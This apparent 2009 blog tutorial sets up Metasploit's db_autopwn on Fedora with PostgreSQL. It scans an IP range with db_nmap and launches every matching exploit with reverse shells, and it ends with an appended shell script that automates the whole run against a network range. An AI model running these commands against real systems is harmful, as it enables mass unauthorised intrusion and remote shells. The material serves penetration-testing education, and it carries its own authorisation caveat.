13 January 2009

Metasploit autopwn

autopwn - automated execution of exploits. Rooting will be much easier for us! At least it should be for me, but with no luck: I never managed to get a shell :(

This tutorial is based on Fedora 9.

Let's start. What do we need?

  • Postgres
  • Metasploit Framework
  • Brain

Metasploit Framework

Postgres - yum install postgresql-server (the Fedora package is called postgresql-server, not postgres; it pulls in the postgresql client package too)

Brain - yum install brain <>

First, start the postgresql service (/sbin/service postgresql start). The first time, the database cluster has to be initialised before the service will start; if the first start does not do it for you, run /sbin/service postgresql initdb first. Metasploit 3 uses ActiveRecord (part of Ruby on Rails) to provide an object-oriented interface to an arbitrary database service, so we need the gems. Here are the steps..

gem install activerecord

gem install postgres (we use postgres as our database; this gem compiles against libpq, so install postgresql-devel and ruby-devel first if the build fails)

To verify the installation (it should produce no output and no error):

$ ruby -e 'require "rubygems"; require "postgres"'

(Older guides use require_gem instead of the second require; that call is deprecated and a plain require works with any RubyGems version.)

Update your framework! Change to the framework directory and run:

svn update

Postgres. Create the database. Make sure postgresql is running first.

# su - postgres

$ psql -d template1 -U postgres

Output :

Welcome to psql 7.4.16, the PostgreSQL interactive terminal.

Type: \copyright for distribution terms
\h for help with SQL commands
\? for help on internal slash commands
\g or terminate with semicolon to execute query
\q to quit

template1=#

(The version line above is from the referenced guide; Fedora 9 ships PostgreSQL 8.3, so yours will differ.)

Next.

template1=# CREATE USER root WITH PASSWORD 'myPassword';

template1=# CREATE DATABASE metasploit3;

template1=# GRANT ALL PRIVILEGES ON DATABASE metasploit3 TO root;

template1=# \q

Note the order in the GRANT: the privileges are on the database and go to the user, not the other way round (getting the two swapped gives an error because there is no database called root). Done with our postgres stuff. Change to the framework directory and type ./msfconsole. Now you have the Metasploit console.

[root@localhost framework-3.1]# ./msfconsole

(metasploit ASCII-art banner)

=[ msf v3.1-release
+ -- --=[ 268 exploits - 118 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >

In the console, type:

load db_postgres

db_create (you will see several NOTICE messages from postgres; ignore them)

db_hosts (should give you no output and no error, which means your connection to postgres is working)

db_nmap 164.0.3.* (change the range to your target; db_nmap needs nmap installed, so yum install nmap if it is missing. You can also pass nmap options, e.g. db_nmap -p 445 164.0.3.* scans only port 445, so the database only records hosts that expose the SMB service and autopwn will only match exploits for that port)

Done with our scanning. The fun part begins! But before that, take a look at the db_autopwn options.

msf > db_autopwn
[*] Usage: db_autopwn [options]
-h Display this help text
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch exploits against all matched targets
-s Only obtain a single shell per target system (NON-FUNCTIONAL)
-r Use a reverse connect shell
-b Use a bind shell on a random port
-I [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range

Launch our attack!

db_autopwn -p -t -e

-p matches exploits against the open ports recorded by db_nmap, -t lists the matching modules, and -e launches them. Consider adding -r: a reverse shell connects back to you and works through firewalls that would block the random bind port used by -b. It will take time, so wait! If you are lucky enough, you will get a shell. Be aware that autopwn throws every matching exploit at every host, so it is noisy and can crash the services it hits; only run it against systems you are authorised to test.
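The whole procedure as one script, an added example that is not from the original post: it builds the SQL the post types into psql (with the GRANT the right way round and the password quoted safely), writes the console commands to a resource file, refuses to run against a target outside an approved prefix, and only calls psql and msfconsole if they are installed. The database name and user follow the post; the target range, the approved prefix, the in_scope guard (a plain prefix check, not db_autopwn's -I/-X options) and the msfconsole -r option for loading a resource file are assumptions about the reader's setup.

```shell
#!/bin/sh
# Added example (not from the original post). Generates the PostgreSQL setup
# and an msfconsole resource file for the db_autopwn run described above.
# Assumptions: msfconsole supports "-r <file>" for resource files; the
# target range and approved prefix at the bottom are placeholders for your lab.

DB_USER=${DB_USER:-root}            # database role, as in the post
DB_NAME=${DB_NAME:-metasploit3}     # database name, as in the post
DB_PASS=${DB_PASS:-myPassword}      # change this

# gen_sql USER DBNAME PASSWORD
# Emits the three statements run as the postgres superuser. Privileges on the
# database are granted TO the role, and single quotes in the password are
# doubled so they cannot break out of the string literal.
gen_sql() {
    esc=$(printf '%s' "$3" | sed "s/'/''/g")
    printf "CREATE USER %s WITH PASSWORD '%s';\n" "$1" "$esc"
    printf "CREATE DATABASE %s;\n" "$2"
    printf "GRANT ALL PRIVILEGES ON DATABASE %s TO %s;\n" "$2" "$1"
}

# gen_rc TARGET PORT
# Emits the console commands from the post as a resource file. The scan is
# limited to one port so only hosts exposing that service get exploit matches,
# and -r asks for reverse shells, which get through inbound firewalls that
# would block a bind shell.
gen_rc() {
    cat <<EOF
load db_postgres
db_create
db_hosts
db_nmap -p $2 $1
db_autopwn -p -t -e -r
EOF
}

# in_scope TARGET PREFIX: returns 0 if TARGET starts with PREFIX, else 1.
# Cheap guard so a typo in the range cannot autopwn the wrong network.
in_scope() {
    case "$1" in
        "$2"*) return 0 ;;
        *)     return 1 ;;
    esac
}

# run TARGET PORT PREFIX: write both files and execute them if the tools exist.
run() {
    in_scope "$1" "$3" || { echo "refusing: $1 is outside approved scope $3" >&2; return 1; }
    dir=$(mktemp -d) || return 1              # private dir, no fixed /tmp names
    gen_sql "$DB_USER" "$DB_NAME" "$DB_PASS" > "$dir/msfdb.sql"
    gen_rc "$1" "$2" > "$dir/autopwn.rc"
    echo "wrote $dir/msfdb.sql and $dir/autopwn.rc"
    if command -v psql >/dev/null 2>&1; then
        su - postgres -c "psql -d template1 -f '$dir/msfdb.sql'"
    fi
    if command -v msfconsole >/dev/null 2>&1; then
        msfconsole -r "$dir/autopwn.rc"
    fi
}

# Usage: AUTOPWN_RUN=1 sh autopwn.sh   (guarded so sourcing the file is harmless)
if [ "${AUTOPWN_RUN:-0}" = 1 ]; then
    run '164.0.3.*' 445 '164.0.3.'
fi
```

If your msfconsole has no -r option, open the generated autopwn.rc and paste its lines into the console one by one; the SQL file can be fed to psql with -f exactly as the script does.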

References:

  • PostgreSQL add or create a user account and grant permission for database
  • http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html

Cheers~